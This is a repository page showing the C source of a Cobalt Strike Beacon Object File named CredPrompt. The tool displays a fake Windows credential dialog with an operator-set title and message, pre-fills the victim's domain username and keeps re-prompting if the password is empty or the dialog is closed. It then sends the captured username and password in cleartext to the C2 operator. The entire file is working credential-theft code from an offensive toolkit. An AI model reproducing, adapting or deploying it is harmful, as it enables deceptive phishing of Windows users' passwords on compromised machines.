Startseite Erkunden Hilfe
Anmelden
zhensolid
/
OperatorsKit
1
0
Fork 0
Dateien Issues 0 Pull-Requests 0 Wiki
Struktur: b6c61186d6
Branches Tags
OperatorsKit
/
KIT
/
CredPrompt
/
credprompt.c

credprompt.c 8.1 KB
Verlauf Originalformat

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284 
  1. #define SECURITY_WIN32
    2. 

  2. 

  3. #include <stdio.h>
    4. 

  4. #include <windows.h>
    5. 

  5. #include <wincred.h>
    6. 

  6. #include <Lmcons.h>
    7. 

  7. #include <security.h>
    8. 

  8. #include "credprompt.h"
    9. 

  9. #include "beacon.h"
    10. 

  10. 

  11. #pragma comment(lib, "Secur32.lib")
    12. 

  12. #pragma comment(lib, "credui.lib")
    13. 

  13. #pragma comment(lib, "ole32.lib")
    14. 

  14. #pragma comment(lib, "user32.lib")
    15. 

  15. 

  16. typedef struct {
    17. 

  17.     UINT timeout;
    18. 

  18.     HANDLE hTimeoutEvent;
    19. 

  19. } TIMEOUT_STRUCT;
    20. 

  20. 

  21. 

  22. 

  23. 

  24. //https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
    25. 

  25. HRESULT BeaconPrintToStreamW(_In_z_ LPCWSTR lpwFormat, ...) {
    26. 

  26. 	HRESULT hr = S_FALSE;
    27. 

  27. 	va_list argList;
    28. 

  28. 	DWORD dwWritten = 0;
    29. 

  29. 

  30. 	if (g_lpStream <= (LPSTREAM)1) {
    31. 

  31. 		hr = OLE32$CreateStreamOnHGlobal(NULL, TRUE, &g_lpStream);
    32. 

  32. 		if (FAILED(hr)) {
    33. 

  33. 			return hr;
    34. 

  34. 		}
    35. 

  35. 	}
    36. 

  36. 

  37. 	if (g_lpwPrintBuffer <= (LPWSTR)1) { 
    38. 

  38. 		g_lpwPrintBuffer = (LPWSTR)MSVCRT$calloc(MAX_STRING, sizeof(WCHAR));
    39. 

  39. 		if (g_lpwPrintBuffer == NULL) {
    40. 

  40. 			hr = E_FAIL;
    41. 

  41. 			goto CleanUp;
    42. 

  42. 		}
    43. 

  43. 	}
    44. 

  44. 

  45. 	va_start(argList, lpwFormat);
    46. 

  46. 	if (!MSVCRT$_vsnwprintf_s(g_lpwPrintBuffer, MAX_STRING, MAX_STRING -1, lpwFormat, argList)) {
    47. 

  47. 		hr = E_FAIL;
    48. 

  48. 		goto CleanUp;
    49. 

  49. 	}
    50. 

  50. 

  51. 	if (g_lpStream != NULL) {
    52. 

  52. 		if (FAILED(hr = g_lpStream->lpVtbl->Write(g_lpStream, g_lpwPrintBuffer, (ULONG)MSVCRT$wcslen(g_lpwPrintBuffer) * sizeof(WCHAR), &dwWritten))) {
    53. 

  53. 			goto CleanUp;
    54. 

  54. 		}
    55. 

  55. 	}
    56. 

  56. 

  57. 	hr = S_OK;
    58. 

  58. 

  59. CleanUp:
    60. 

  60. 

  61. 	if (g_lpwPrintBuffer != NULL) {
    62. 

  62. 		MSVCRT$memset(g_lpwPrintBuffer, 0, MAX_STRING * sizeof(WCHAR)); 
    63. 

  63. 	}
    64. 

  64. 

  65. 	va_end(argList);
    66. 

  66. 	return hr;
    67. 

  67. }
    68. 

  68. 

  69. //https://github.com/outflanknl/C2-Tool-Collection/blob/main/BOF/Psx/SOURCE/Psx.c
    70. 

  70. VOID BeaconOutputStreamW() {
    71. 

  71. 	STATSTG ssStreamData = { 0 };
    72. 

  72. 	SIZE_T cbSize = 0;
    73. 

  73. 	ULONG cbRead = 0;
    74. 

  74. 	LARGE_INTEGER pos;
    75. 

  75. 	LPWSTR lpwOutput = NULL;
    76. 

  76. 

  77. 	if (FAILED(g_lpStream->lpVtbl->Stat(g_lpStream, &ssStreamData, STATFLAG_NONAME))) {
    78. 

  78. 		return;
    79. 

  79. 	}
    80. 

  80. 

  81. 	cbSize = ssStreamData.cbSize.LowPart;
    82. 

  82. 	lpwOutput = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, cbSize + 1);
    83. 

  83. 	if (lpwOutput != NULL) {
    84. 

  84. 		pos.QuadPart = 0;
    85. 

  85. 		if (FAILED(g_lpStream->lpVtbl->Seek(g_lpStream, pos, STREAM_SEEK_SET, NULL))) {
    86. 

  86. 			goto CleanUp;
    87. 

  87. 		}
    88. 

  88. 

  89. 		if (FAILED(g_lpStream->lpVtbl->Read(g_lpStream, lpwOutput, (ULONG)cbSize, &cbRead))) {		
    90. 

  90. 			goto CleanUp;
    91. 

  91. 		}
    92. 

  92. 

  93. 		BeaconPrintf(CALLBACK_OUTPUT, "%ls", lpwOutput);
    94. 

  94. 	}
    95. 

  95. 

  96. CleanUp:
    97. 

  97. 	if (g_lpStream != NULL) {
    98. 

  98. 		g_lpStream->lpVtbl->Release(g_lpStream);
    99. 

  99. 		g_lpStream = NULL;
    100. 

  100. 	}
    101. 

  101. 

  102. 	if (g_lpwPrintBuffer != NULL) {
    103. 

  103. 		MSVCRT$free(g_lpwPrintBuffer); 
    104. 

  104. 		g_lpwPrintBuffer = NULL;
    105. 

  105. 	}
    106. 

  106. 

  107. 	if (lpwOutput != NULL) {
    108. 

  108. 		KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, lpwOutput);
    109. 

  109. 	}
    110. 

  110. 	return;
    111. 

  111. }
    112. 

  112. 

  113. 

  114. BOOL is_empty_or_whitespace(WCHAR *str) {
    115. 

  115.     if (str == NULL) {
    116. 

  116.         return TRUE;
    117. 

  117.     }
    118. 

  118. 

  119.     while (*str) {
    120. 

  120.         if (!MSVCRT$iswspace(*str)) {
    121. 

  121.             return FALSE;
    122. 

  122.         }
    123. 

  123.         str++;
    124. 

  124.     }
    125. 

  125.     return TRUE;
    126. 

  126. }
    127. 

  127. 

  128. 

  129. BOOL CALLBACK EnumWindowsProc(HWND hWnd, LPARAM lParam) {
    130. 

  130.     WCHAR className[256] = {0};
    131. 

  131.     USER32$GetClassNameW(hWnd, className, sizeof(className) / sizeof(WCHAR));
    132. 

  132. 

  133.     if (MSVCRT$wcscmp(className, L"Credential Dialog Xaml Host") == 0) {
    134. 

  134.         USER32$PostMessageW(hWnd, WM_CLOSE, 0, 0);
    135. 

  135.         return FALSE;
    136. 

  136.     }
    137. 

  137. 

  138.     return TRUE;
    139. 

  139. }
    140. 

  140. 

  141. 

  142. DWORD WINAPI PromptWithTimeout(LPVOID lParam) {
    143. 

  143.     TIMEOUT_STRUCT *pTimeoutStruct = (TIMEOUT_STRUCT *)lParam;
    144. 

  144.     UINT timeout = pTimeoutStruct->timeout;
    145. 

  145.     HANDLE hTimeoutEvent = pTimeoutStruct->hTimeoutEvent;
    146. 

  146. 

  147.     KERNEL32$Sleep(timeout * 1000);
    148. 

  148.     USER32$EnumWindows(EnumWindowsProc, 0);
    149. 

  149.     KERNEL32$SetEvent(hTimeoutEvent);
    150. 

  150. 

  151.     return 0;
    152. 

  152. }
    153. 

  153. 

  154. 

  155. BOOL PromptForCreds(LPWSTR title, LPWSTR message, LPWSTR *username, LPWSTR *password, LPWSTR *domain, UINT timeout)
    156. 

  156. {
    157. 

  157.     PVOID packed_credentials = NULL;
    158. 

  158.     ULONG packed_credentials_size = 0;
    159. 

  159. 	
    160. 

  160. 	HANDLE hTimeoutEvent = KERNEL32$CreateEventW(NULL, TRUE, FALSE, NULL);
    161. 

  161. 

  162.     // Get current username in DOMAIN\USERNAME format
    163. 

  163.     WCHAR domainUsername[DNLEN + UNLEN + 2];
    164. 

  164.     ULONG nSize = sizeof(domainUsername) / sizeof(WCHAR);
    165. 

  165.     if (SECUR32$GetUserNameExW(NameSamCompatible, domainUsername, &nSize)) {
    166. 

  166.         // Pack current username
    167. 

  167.         WCHAR prefilled_username[DNLEN + UNLEN + 2];
    168. 

  168.         MSVCRT$_snwprintf(prefilled_username, (sizeof(prefilled_username) / sizeof(WCHAR)) - 1, L"%s", domainUsername);
    169. 

  169. 

  170.         CREDUI$CredPackAuthenticationBufferW(0, prefilled_username, L"", NULL, &packed_credentials_size);
    171. 

  171.         packed_credentials = MSVCRT$malloc(packed_credentials_size);
    172. 

  172.         CREDUI$CredPackAuthenticationBufferW(0, prefilled_username, L"", (PBYTE)packed_credentials, &packed_credentials_size);
    173. 

  173.     }
    174. 

  174. 	
    175. 

  175.     BOOL bValidPassword = FALSE;
    176. 

  176.     DWORD result;
    177. 

  177. 	
    178. 

  178. 	TIMEOUT_STRUCT timeoutStruct;
    179. 

  179. 	timeoutStruct.timeout = timeout;
    180. 

  180. 	timeoutStruct.hTimeoutEvent = hTimeoutEvent;
    181. 

  181. 

  182. 	DWORD threadId;
    183. 

  183. 	HANDLE hThread = KERNEL32$CreateThread(NULL, 0, PromptWithTimeout, (LPVOID)&timeoutStruct, 0, &threadId);
    184. 

  184. 	
    185. 

  185. 	BeaconPrintToStreamW(L"\nPrompt event log:\n");
    186. 

  186. 	BeaconPrintToStreamW(L"==============================================\n");
    187. 

  187. 	
    188. 

  188.     do {
    189. 

  189.         // Prompt for credentials
    190. 

  190.         CREDUI_INFOW credui_info = {0};
    191. 

  191.         credui_info.cbSize = sizeof(credui_info);
    192. 

  192.         credui_info.pszCaptionText = title;
    193. 

  193.         credui_info.pszMessageText = message;
    194. 

  194. 		credui_info.hwndParent = NULL;
    195. 

  195. 		
    196. 

  196. 		HWND hWnd = USER32$GetForegroundWindow();
    197. 

  197. 		if (hWnd != NULL) {
    198. 

  198. 			credui_info.hwndParent = hWnd;
    199. 

  199. 		}
    200. 

  200. 

  201.         DWORD auth_package = 0;
    202. 

  202.         BOOL save_credentials = FALSE;
    203. 

  203.         ULONG out_credentials_size = 0;
    204. 

  204.         LPVOID out_credentials = NULL;
    205. 

  205. 

  206.         result = CREDUI$CredUIPromptForWindowsCredentialsW(&credui_info, 0, &auth_package, packed_credentials, packed_credentials_size, &out_credentials, &out_credentials_size, &save_credentials, CREDUIWIN_GENERIC | CREDUIWIN_CHECKBOX);
    207. 

  207. 

  208.         if (result == NO_ERROR)
    209. 

  209.         {
    210. 

  210.             *username = (LPWSTR)MSVCRT$malloc(CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
    211. 

  211.             *password = (LPWSTR)MSVCRT$malloc(CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
    212. 

  212.             *domain = (LPWSTR)MSVCRT$malloc(CREDUI_MAX_USERNAME_LENGTH * sizeof(WCHAR));
    213. 

  213. 

  214.             ULONG max_username = CREDUI_MAX_USERNAME_LENGTH;
    215. 

  215.             ULONG max_password = CREDUI_MAX_USERNAME_LENGTH;
    216. 

  216.             ULONG max_domain = CREDUI_MAX_USERNAME_LENGTH;
    217. 

  217.             CREDUI$CredUnPackAuthenticationBufferW(0, out_credentials, out_credentials_size, *username, &max_username, *domain, &max_domain, *password, &max_password);
    218. 

  218. 	
    219. 

  219.             bValidPassword = !is_empty_or_whitespace(*password);
    220. 

  220.             if (!bValidPassword) {
    221. 

  221.                 BeaconPrintToStreamW(L"[!] User tried to enter empty password\n");
    222. 

  222.             }
    223. 

  223.             MSVCRT$memset(out_credentials, 0, out_credentials_size);
    224. 

  224.             OLE32$CoTaskMemFree(out_credentials);
    225. 

  225. 		}
    226. 

  226. 		
    227. 

  227. 		else {
    228. 

  228. 			if (KERNEL32$WaitForSingleObject(hTimeoutEvent, 0) == WAIT_OBJECT_0) {
    229. 

  229. 				BeaconPrintToStreamW(L"[!] Credential prompt timed out\n");
    230. 

  230. 				break;
    231. 

  231. 				
    232. 

  232. 			} else {
    233. 

  233. 				BeaconPrintToStreamW(L"[!] User tried to close the prompt\n");
    234. 

  234. 			}
    235. 

  235. 		}
    236. 

  236. 	} while (!bValidPassword);
    237. 

  237. 	
    238. 

  238. 	KERNEL32$TerminateThread(hThread, 0);
    239. 

  239. 	KERNEL32$CloseHandle(hThread);
    240. 

  240. 	
    241. 

  241. 	if (packed_credentials)
    242. 

  242. 	{
    243. 

  243. 	MSVCRT$memset(packed_credentials, 0, packed_credentials_size);
    244. 

  244. 		MSVCRT$free(packed_credentials);
    245. 

  245. 	}
    246. 

  246. 

  247. 	return bValidPassword;
    248. 

  248. }
    249. 

  249. 

  250. 

  251. int go(char *args, int len) {
    252. 

  252. 	LPWSTR title = L"";
    253. 

  253. 	LPWSTR message = L"";
    254. 

  254.     LPWSTR username = NULL;
    255. 

  255.     LPWSTR password = NULL;
    256. 

  256. 	LPWSTR domain = NULL;
    257. 

  257.     UINT timer_seconds = 60;
    258. 

  258. 	datap parser;
    259. 

  259. 	
    260. 

  260. 	BeaconDataParse(&parser, args, len);
    261. 

  261. 	title = BeaconDataExtract(&parser, NULL);
    262. 

  262. 	message = BeaconDataExtract(&parser, NULL);
    263. 

  263. 	timer_seconds = BeaconDataInt(&parser, NULL);
    264. 

  264. 	
    265. 

  265. 	
    266. 

  266.     if (PromptForCreds(title, message, &username, &password, &domain, timer_seconds))
    267. 

  267. 	{
    268. 

  268.         BeaconPrintToStreamW(L"[+] User entered something:\n\tUsername: %ls\n\tPassword: %ls\n", username, password);
    269. 

  269. 		BeaconOutputStreamW();
    270. 

  270. 		
    271. 

  271. 		MSVCRT$memset(password, 0, MSVCRT$wcslen(password) * sizeof(WCHAR));
    272. 

  272.         MSVCRT$free(username);
    273. 

  273.         MSVCRT$free(password);
    274. 

  274.         MSVCRT$free(domain);
    275. 

  275.     }
    276. 

  276.     else
    277. 

  277.     {
    278. 

  278. 		BeaconOutputStreamW();
    279. 

  279.         BeaconPrintf(CALLBACK_ERROR, "No credentials were obtained.\n");
    280. 

  280.     }
    281. 

  281. 

  282.     return 0;
    283. 

  283. }
    284. 

  284.